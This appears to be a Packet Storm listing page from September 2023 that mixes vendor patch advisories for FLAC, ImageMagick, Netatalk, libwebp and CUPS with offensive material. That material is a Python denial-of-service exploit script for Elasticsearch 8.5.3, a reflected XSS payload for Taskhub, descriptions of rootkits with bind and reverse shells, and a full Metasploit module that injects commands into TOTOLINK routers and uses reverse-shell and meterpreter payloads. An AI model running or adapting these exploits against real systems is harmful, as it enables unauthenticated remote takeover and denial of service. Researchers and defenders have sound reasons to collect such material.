Elasticsearch version 8.5.3 stack overflow proof of concept exploit.

# Exploit Author: TOUHAMI KASBAOUI  
# Vendor Homepage: https://elastic.co/  
# Version: 8.5.3 / OpenSearch  
# Tested on: Ubuntu 20.04 LTS  
# CVE : CVE-2023-31419  
# Ref: https://github.com/sqrtZeroKnowledge/Elasticsearch-Exploit-CVE-2023-31419

import requests  
import random  
import string

es_url = 'http://localhost:9200'  # Replace with your Elasticsearch server URL  
index_name = '*'

payload = "/*" * 10000 + "\\" +"'" * 999

verify_ssl = False

username = 'elastic'  
password = 'changeme'

auth = (username, password)

num_queries = 100

for _ in range(num_queries):  
    symbols = ''.join(random.choice(string.ascii_letters + string.digits + '^') for _ in range(5000))  
    search_query = {  
        "query": {  
            "match": {  
                "message": (symbols * 9000) + payload  
            }  
        }  
    }

    print(f"Query {_ + 1} - Search Query:")

    search_endpoint = f'{es_url}/{index_name}/_search'  
    response = requests.get(search_endpoint, json=search_query, verify=verify_ssl, auth=auth)

    if response.status_code == 200:  
        search_results = response.json()

        print(f"Query {_ + 1} - Response:")  
        print(search_results)

        total_hits = search_results['hits']['total']['value']  
        print(f"Query {_ + 1}: Total hits: {total_hits}")

        for hit in search_results['hits']['hits']:  
            source_data = hit['_source']  
            print("Payload result: {search_results}")  
    else:  
        print(f"Error for query {_ + 1}: {response.status_code} - {response.text}")

Elasticsearch 8.5.3 Stack Overflow

BDS Freebsd KLD rootkit for FreeBSD 13 that hides files, hides processes, hides ports, and has a bind shell backdoor.

BDS FreeBSD KLD Rootkit

Ftrace-based Linux loadable kernel module rootkit for Linux kernel versions 5.x and 6.x on x86_64. It hides files, hides process, hides a bind shell and reverse shell port, provides privilege escalation, and cleans up logs and bash history during installation.

BDS Linux LKM Ftrace-Based Rootkit

Ubuntu Security Notice 6360-2 - USN-6360-1 fixed a vulnerability in FLAC. This update provides the corresponding update for Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and Ubuntu 18.04 LTS. It was discovered that FLAC incorrectly handled encoding certain files. A remote attacker could use this issue to cause FLAC to crash, resulting in a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6360-2  
September 22, 2023

flac vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

FLAC could be made to crash or run programs as your login if it opened a  
specially crafted file.

Software Description:  
- flac: Free Lossless Audio Codec

Details:

USN-6360-1 fixed a vulnerability in FLAC. This update provides the  
corresponding update for Ubuntu 14.04 LTS, Ubuntu 16.04 LTS, and  
Ubuntu 18.04 LTS.

Original advisory details:

  It was discovered that FLAC incorrectly handled encoding certain files. A  
  remote attacker could use this issue to cause FLAC to crash, resulting   
in a  
  denial of service, or possibly execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   flac                            1.3.2-1ubuntu0.1+esm1  
   libflac8                        1.3.2-1ubuntu0.1+esm1

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   flac                            1.3.1-4ubuntu0.1~esm2  
   libflac8                        1.3.1-4ubuntu0.1~esm2

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   flac                            1.3.0-2ubuntu0.14.04.1+esm2  
   libflac8                        1.3.0-2ubuntu0.14.04.1+esm2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6360-2  
   https://ubuntu.com/security/notices/USN-6360-1  
   CVE-2020-22219

Ubuntu Security Notice USN-6360-2

Taskhub version 2.8.8 suffers from a cross site scripting vulnerability.

    ## Title: TASKHUB-2.8.8-XSS-Reflected## Author: nu11secur1ty## Date: 09/22/2023## Vendor: https://codecanyon.net/user/infinitietech## Software: https://codecanyon.net/item/taskhub-project-management-finance-crm-tool/25685874## Reference: https://portswigger.net/web-security/cross-site-scripting## Description:The value of the JSON parameter within the project parameter is copiedinto the HTML document as plain text between tags. The payloadvn5mr<img src=a onerror=alert(1)>i62kl was submitted in the JSONparameter within the project parameter. This input was echoedunmodified in the application's response. The already authenticated(by using a USER ACCOUNT)attacker can get a CSRF token and cookiesession it depends on the scenarios.STATUS: HIGH Vulnerability[+]Test exploit:```surw7%3Cscript%3Ealert(1)%3C%2fscript%3E```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/infinitietech/TASKHUB-2.8.8)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/09/taskhub-288-xss-reflected.html)## Time spent:01:10:00

Taskhub 2.8.8 Cross Site Scripting

Ubuntu Security Notice 6393-1 - It was discovered that ImageMagick did not properly handle memory when processing the -help option. An attacker could potentially use this issue to cause a crash.

==========================================================================  
Ubuntu Security Notice USN-6393-1  
September 21, 2023

imagemagick vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

ImageMagick could be made to crash when processing the -help option.

Software Description:  
- imagemagick: Image manipulation programs and library

Details:

It was discovered that ImageMagick did not properly handle memory when  
processing the -help option. An attacker could potentially use this  
issue to cause a crash.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS (Available with Ubuntu Pro):  
   imagemagick 8:6.9.10.23+dfsg-2.1ubuntu11.9+esm1  
   imagemagick-6.q16 8:6.9.10.23+dfsg-2.1ubuntu11.9+esm1  
   imagemagick-6.q16hdri 8:6.9.10.23+dfsg-2.1ubuntu11.9+esm1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   imagemagick 8:6.9.7.4+dfsg-16ubuntu6.15+esm2  
   imagemagick-6.q16 8:6.9.7.4+dfsg-16ubuntu6.15+esm2  
   imagemagick-6.q16hdri           8:6.9.7.4+dfsg-16ubuntu6.15+esm2

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   imagemagick                        8:6.8.9.9-7ubuntu5.16+esm9  
   imagemagick-6.q16               8:6.8.9.9-7ubuntu5.16+esm9

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   imagemagick                        8:6.7.7.10-6ubuntu3.13+esm6

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6393-1  
   CVE-2022-48541

Ubuntu Security Notice USN-6393-1

Debian Linux Security Advisory 5503-1 - Multiple security issues were discovered in Netatalk, an implementation of the Apple Filing Protocol (AFP) for offering file service (mainly) to macOS clients, which may result in the execution of arbitrary code or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5503-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffSeptember 20, 2023                    https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : netatalkCVE ID         : CVE-2021-31439 CVE-2022-0194 CVE-2022-23121 CVE-2022-23122                  CVE-2022-23123 CVE-2022-23124 CVE-2022-23125 CVE-2022-43634                  CVE-2022-45188 CVE-2023-42464Debian Bug     : 1051066Multiple security issues were discovered in Netatalk, an implementationof the Apple Filing Protocol (AFP) for offering file service (mainly) tomacOS clients, which may result in the execution of arbitrary code orinformation disclosure.  For the oldstable distribution (bullseye), these problems have been fixedin version 3.1.12~ds-8+deb11u1.We recommend that you upgrade your netatalk packages.For the detailed security status of netatalk please refer toits security tracker page at:https://security-tracker.debian.org/tracker/netatalkFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmULMA8ACgkQEMKTtsN8TjYw9xAArA2NN4zvH7wC6Itn5ry9kZhQS4BhkCk10WXd0L77k2qzRRTMMw9OBmNnLk5w3/9oJhqBmtNkLerfBCSMA1aQFQfWOefJnywY/2lYYSS6Uc18Xze78CW4w2O1/EkK836N6vSVuptjlcvTFGc61XUpbaZJ8CN4ipb2A0tNgp7Ja+Hrz4RgnrS2ppKPgmNuZ5iDcX9N9PohNPTnHc4jQkRscuPN1lsPDrc0OP4E2V7oFm8G7EKexO9BtREqeznaj0Bkcbvddquqz4dnPXOYjkXzoedvGYmI2J5EigIiBMNugL02zExbuhVCmVNlit29LDVAbgNpPgbUi9NRRe9EMXHI+XFgp/xB34jtyq3617SBPLelLBP/e41BqnuaE8C+37uxvIcSgbVibpzhtHkiXTffOpqR3mduXG/VrbuvqO7yzw1sjXrks867wV1QrQPbX1O99sY+wg69jdyS/QTUQYHkDSGW2Ud+9u7Pv6Bkh/ibXIxHcNiWKaE2LPJia8mWurmV/r4l325E09jJGxZON4CKiU50+FMKLi8Eo+uXdKDL+dyey9GQBBWQIU0nzg4oJQ/59oGnTib2C52hyZU6xtQbdCceqP2M+4/x75xtCkR5pLcvTnDqRBvnyYBvREbFCz3X46cdxzkbeu/SQWIBLAGXv7yktz8YX8y5Q6h4798FpVY==jmG2-----END PGP SIGNATURE-----

Debian Security Advisory 5503-1

Red Hat Security Advisory 2023-5309-01 - The libwebp packages provide a library and tools for the WebP graphics format. WebP is an image format with a lossy compression of digital photographic images. WebP consists of a codec based on the VP8 format, and a container based on the Resource Interchange File Format. Webmasters, web developers and browser developers can use WebP to compress, archive, and distribute digital images more efficiently. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libwebp security update  
Advisory ID:       RHSA-2023:5309-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5309  
Issue date:        2023-09-20  
CVE Names:         CVE-2023-4863   
=====================================================================

1. Summary:

An update for libwebp is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

The libwebp packages provide a library and tools for the WebP graphics  
format. WebP is an image format with a lossy compression of digital  
photographic images. WebP consists of a codec based on the VP8 format, and  
a container based on the Resource Interchange File Format (RIFF).  
Webmasters, web developers and browser developers can use WebP to compress,  
archive, and distribute digital images more efficiently.

Security Fix(es):

* libwebp: Heap buffer overflow in WebP Codec (CVE-2023-4863)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2238431 - CVE-2023-4863 libwebp: Heap buffer overflow in WebP Codec

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
libwebp-1.0.0-8.el8_8.1.src.rpm

aarch64:  
libwebp-1.0.0-8.el8_8.1.aarch64.rpm  
libwebp-debuginfo-1.0.0-8.el8_8.1.aarch64.rpm  
libwebp-debugsource-1.0.0-8.el8_8.1.aarch64.rpm  
libwebp-devel-1.0.0-8.el8_8.1.aarch64.rpm  
libwebp-java-debuginfo-1.0.0-8.el8_8.1.aarch64.rpm  
libwebp-tools-debuginfo-1.0.0-8.el8_8.1.aarch64.rpm

ppc64le:  
libwebp-1.0.0-8.el8_8.1.ppc64le.rpm  
libwebp-debuginfo-1.0.0-8.el8_8.1.ppc64le.rpm  
libwebp-debugsource-1.0.0-8.el8_8.1.ppc64le.rpm  
libwebp-devel-1.0.0-8.el8_8.1.ppc64le.rpm  
libwebp-java-debuginfo-1.0.0-8.el8_8.1.ppc64le.rpm  
libwebp-tools-debuginfo-1.0.0-8.el8_8.1.ppc64le.rpm

s390x:  
libwebp-1.0.0-8.el8_8.1.s390x.rpm  
libwebp-debuginfo-1.0.0-8.el8_8.1.s390x.rpm  
libwebp-debugsource-1.0.0-8.el8_8.1.s390x.rpm  
libwebp-devel-1.0.0-8.el8_8.1.s390x.rpm  
libwebp-java-debuginfo-1.0.0-8.el8_8.1.s390x.rpm  
libwebp-tools-debuginfo-1.0.0-8.el8_8.1.s390x.rpm

x86_64:  
libwebp-1.0.0-8.el8_8.1.i686.rpm  
libwebp-1.0.0-8.el8_8.1.x86_64.rpm  
libwebp-debuginfo-1.0.0-8.el8_8.1.i686.rpm  
libwebp-debuginfo-1.0.0-8.el8_8.1.x86_64.rpm  
libwebp-debugsource-1.0.0-8.el8_8.1.i686.rpm  
libwebp-debugsource-1.0.0-8.el8_8.1.x86_64.rpm  
libwebp-devel-1.0.0-8.el8_8.1.i686.rpm  
libwebp-devel-1.0.0-8.el8_8.1.x86_64.rpm  
libwebp-java-debuginfo-1.0.0-8.el8_8.1.i686.rpm  
libwebp-java-debuginfo-1.0.0-8.el8_8.1.x86_64.rpm  
libwebp-tools-debuginfo-1.0.0-8.el8_8.1.i686.rpm  
libwebp-tools-debuginfo-1.0.0-8.el8_8.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-4863  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlC2QbAAoJENzjgjWX9erEzWEP/RoVS4AKvr4lfMcbihL5nefx  
pHV7RBMS4wnPlijWCYR2rRU99zXQduYYR9v5W+wo0AItLgSQgUI0d5j19Wvz0PXG  
iLY1sEE/NvSUBEVzrL0MflB7Vb9hK03UMepNlL7H04kvh0snyD/VcxK+91fIwofW  
6fy0nGayX6SZevPdc+rAO35Qv+9FyIHdREQLZeP07kOq+nXCWOfvoLGTYerMmZrS  
s0hmbanNMM2wP5YeCJ2ve/TyGFKjvf1BU/Uq8HuAlRU9vd98Nt2Hthnk2PByKTMs  
mMLeI5IQBCOSMZB74iohME0i3EvL98e68DF3PoW5XIqjGVR/4FtLCL5KKVhNZSbf  
Ub75bXR1snx3ktABeBPcJRAQ3ei+aCuLOm/DgoAGPZT6PFLG3gKBQvG8ckcMyOcs  
LfvkdccdZpXQn/hhT+7mp57O2GhySA2kA3ClEWuoSHdTl7hg71Tuo8krUQpIs1fo  
IOK2M8IoCosacVm86Th7NnkTApIcXoB4ezNZHWlzGViELuhzADigygOnnAJXc9SQ  
m4Xp45Kg8jdAILjGWt5rT86p4VqOofd0IkvL51DhmBvWvuny8D2IzlVI4CDJWtiv  
8OgdvmeKJUCcpV2Y440JyfB1E6ZhijdEWVl409QAMcXKIpHbBXtppkrG0K/3RAoh  
u3mW7CneTPPB4K3EB2qr  
=zH4H  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5309-01

Multiple TOTOLINK network products contain a command injection vulnerability in setting/setTracerouteCfg. This vulnerability allows an attacker to execute arbitrary commands through the command parameter. After exploitation, an attacker will have full access with the same user privileges under which the webserver is running - which is typically root.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/stopwatch'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'TOTOLINK Wireless Routers unauthenticated remote command execution vulnerability.',        'Description' => %q{          Multiple TOTOLINK network products contain a command insertion vulnerability in setting/setTracerouteCfg.          This vulnerability allows an attacker to execute arbitrary commands through the "command" parameter.          After exploitation, an attacker will have full access with the same user privileges under          which the webserver is running (typically as user `root`, ;-).          The following TOTOLINK network products and firmware are vulnerable:          - Wireless Gigabit Router model X5000R with firmware X5000R_V9.1.0u.6118_B20201102.zip;          - Wireless Gigabit Router model A7000R with firmware A7000R_V9.1.0u.6115_B20201022.zip;          - Wireless Gigabit Router model A3700R with firmware A3700R_V9.1.2u.6134_B20201202.zip;          - Wireless N Router model N200RE V5 with firmware N200RE_V5_V9.3.5u.6095_B20200916.zip;          - Wireless N Router model N200RE V5 with firmware N200RE_V5_V9.3.5u.6139_B20201216.zip;          - Wireless N Router model N350RT with firmware N350RT_V9.3.5u.6095_B20200916.zip;          - Wireless N Router model N350RT with firmware N350RT_V9.3.5u.6139_B20201216.zip;          - Wireless Extender model EX1200L with firmware EX1200L_V9.3.5u.6146_B20201023.zip; and          - probably more looking at the scale of impacted devices :-(        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'Kazamayc https://github.com/Kazamayc', # Discovery of the vulnerability        ],        'References' => [          ['CVE', '2023-30013'],          ['URL', 'https://attackerkb.com/topics/xnX3I3PEgM/cve-2023-30013'],          ['URL', 'https://github.com/Kazamayc/vuln/tree/main/TOTOLINK/X5000R/2']        ],        'DisclosureDate' => '2023-05-05',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_MIPSLE],        'Privileged' => true,        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_MIPSLE],              'Type' => :linux_dropper,              'CmdStagerFlavor' => ['wget', 'echo'],              'Linemax' => 65535,              'DefaultOptions' => {                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 80,          'SSL' => false        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )    register_options([      OptInt.new('SLEEP', [true, 'Sleep time in seconds to test blind command injection', 3])    ])  end  def execute_command(cmd, _opts = {})    num = rand(1..500)    return send_request_cgi({      'method' => 'POST',      'ctype' => 'application/x-www-form-urlencoded',      'uri' => normalize_uri(target_uri.path, 'cgi-bin', 'cstecgi.cgi'),      'keep_cookies' => true,      'data' => "{\"command\":\"127.0.0.1; #{cmd};#\",\"num\":\"#{num}\",\"topicurl\":\"setTracerouteCfg\"}"    })  end  def check    # Checking if the target is vulnerable by executing a randomized sleep to test the remote code execution    print_status("Checking if #{peer} can be exploited.")    sleep_time = datastore['SLEEP']    # check response with echo command to determine if traceroute vulnerable function is available    res = execute_command("echo #{sleep_time}")    return CheckCode::Unknown('No response received from target.') unless res    return CheckCode::Safe('No valid response received from target.') unless res.code == 200 && res.body.include?('success')    # if traceroute vulnerable function is available, perform blind command injection using the sleep comnmand    print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.")    res, elapsed_time = Rex::Stopwatch.elapsed_time do      execute_command("sleep #{sleep_time}")    end    return CheckCode::Unknown('No response received from target.') unless res    return CheckCode::Safe('No valid response received from target.') unless res.code == 200 && res.body.include?('success')    print_status("Elapsed time: #{elapsed_time.round(2)} seconds.")    return CheckCode::Safe('Blind command injection failed.') unless elapsed_time >= sleep_time    CheckCode::Vulnerable('Successfully tested blind command injection.')  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      # Don't check the response here since the server won't respond      # if the payload is successfully executed.      execute_cmdstager({ linemax: target.opts['Linemax'] })    end  endend

TOTOLINK Wireless Routers Remote Command Execution

Ubuntu Security Notice 6391-2 - USN-6391-1 fixed a vulnerability in CUPS. This update provides the corresponding update for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS. It was discovered that CUPS incorrectly parsed certain Postscript objects. If a user or automated system were tricked into printing a specially crafted document, a remote attacker could use this issue to cause CUPS to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6391-2September 21, 2023cups vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 18.04 LTS (Available with Ubuntu Pro)- Ubuntu 16.04 LTS (Available with Ubuntu Pro)Summary:CUPS could be made to crash or run programs if it opened a speciallycrafted file.Software Description:- cups: Common UNIX Printing System(tm)Details:USN-6391-1 fixed a vulnerability in CUPS. This update providesthe corresponding update for Ubuntu 16.04 LTS and Ubuntu 18.04 LTS.Original advisory details: It was discovered that CUPS incorrectly parsed certain Postscript objects. If a user or automated system were tricked into printing a specially crafted document, a remote attacker could use this issue to cause CUPS to crash, resulting in a denial of service, or possibly execute arbitrary code.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 18.04 LTS (Available with Ubuntu Pro):  cups                            2.2.7-1ubuntu2.10+esm2Ubuntu 16.04 LTS (Available with Ubuntu Pro):  cups                            2.1.3-4ubuntu0.11+esm4In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-6391-2  https://ubuntu.com/security/notices/USN-6391-1  CVE-2023-4504

Source

Packet Storm